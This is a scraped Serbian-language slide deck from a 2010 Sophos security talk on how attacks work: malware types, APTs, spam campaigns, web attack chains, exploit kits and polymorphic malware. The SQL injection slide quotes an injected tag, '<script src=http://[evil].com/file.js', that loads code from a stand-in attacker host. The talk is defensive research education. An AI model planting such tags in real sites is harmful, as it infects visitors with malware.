810 likes | 913 Views
Ana tomija napada – duhovi u mašini. Vanja Svajcer Principal Researcher – Sophos Beograd, 13 Maj 2010. Šta radi SophosLab s ?. Sakuplja pretnje Analizira i klasifikuje Kreira detekcije i otklanja pretnje Objavljuje sveže definicije i informacije Istraživanje i razvoj
E N D
Anatomijanapada – duhovi u mašini Vanja Svajcer Principal Researcher – Sophos Beograd, 13 Maj 2010
Šta radi SophosLabs? • Sakuplja pretnje • Analizira i klasifikuje • Kreira detekcije i otklanja pretnje • Objavljuje sveže definicije i informacije • Istraživanje i razvoj • Nešto više informacija videćemo kasnije
Anatomija napada • Postavljanje scenarija • Zlonamerni softver (Malware) • Tehnike napada • Proces analize i alati • Tehnologija zaštite
Tipovi malicioznog softvera • Virus • Trojanac • Crv (Worm)
Ko se nekada bavio pisanjem virusa? Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje Školarci Srednjoškolci Studenti IT profesionalci Uglavnom muškarci Nikako A/V kompanije
Ko piše malver danas? Virusi se retko viđaju, ali čini se da opet postaju popularni U pitanju je novac U osnovi se svodi na kriminal ( I dalje postoji tamo neki pegavi tinejdžer…)
APT • Advanced Persistent Threat • Moderan izraz za “targeted malware” • Mala veličina (oko 100k) i posebne namene • Nema pakovanja • Izgleda kao legitiman Windows fajl • Neovlašćeni prikriveni transfer podataka (Data Exfiltration) • Težak za uklanjanje
Email pretnje • Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a • 2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem • Iste stare taktike socijalnog inženjeringa • UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.
Top spemovani malver (2009) • Dominiraju ključne familijemalvera • Bredo • Waled • Jednostavnoali i dalje radi!
Socijalni inženjering – Bredo Mal/Bredo • Ista kampanja može obuhvatati brojne “različite” priloge
BredovsZbot • Konkurencija između botova!!! • Bredopokušava da onemogući bilo koji instalirani Zbot • Vrlo slično poput NetskyvsBaglerata od pre par godina!!!
Email pretnje • Globalnespem zamke za praćenje spema • SADusmerava više spema nego bilo koja druga pojedinačna država • Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade
Web najdominantniji • 99% inficiranih sistema su legitimni kompromitovani sajtovi • Sajtovi za napad • Botnet C&C korišćenjem HTTP • Napadi i dalje često počinju spemovanjem email-a
Korak1: preusmeravanje sa kompromitovanog sajta Kompromitovani web sajtovi Attacker-controlledredirects Attack site usingbundle of exploits Payload
SQL injection DB DB DB Malicious SQLinjection • Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection • Šalju maliciozneHTTP zahteve (Demo)
SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js • SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima • Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove
SQL injection • Korisnik se kreće web sajtom • Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera • Žrtva postaje inficirana malverom:Asproxtrojan
Blackhat SEO • Kompromitovani hostovi zasejani sa SEO-kitovima • Povećavaju rangiranje stranice
SEO trovanje • Pretraga po popularnim rečima
Korak3: Preuzimanje sadržaja sa napadačevog sajta Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristi više kombinovanih ranjivosti Payload
Web napadi Izrađen korišćenjem kupljenih kompleta alata MPack, IcePack, GPack,Neosploit, Eleonore, Yes Konzola za upravljanje Phishing Otkriven: 19. oktobra 2009. • Najpogođenije države: • Francuska – 4% • SAD– 17% • Velika Britanija – 3% • Nemačka – 6%
Web napadi Pregled po programimaza pregled Internet sadržaja! Polimorfizam sa serverske strane • Procenat pogođenih: • MSIE – 12% • FireFox – 1% • Opera – 5%
Slabosti polimorfnog malvera • Poly-engine je deo koda • Može biti reverzovan od strane upornog istraživača • Mora biti dekriptovan u memoriji • Emulira programski kod dok se ne nađe prava varijanta • Detekcija može biti bazirana po proceduri dekripcije
Korak4: Napadni žrtve kroz ranjivosti, zarazi ih Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristiviše kombinovanih ranjivosti Tovar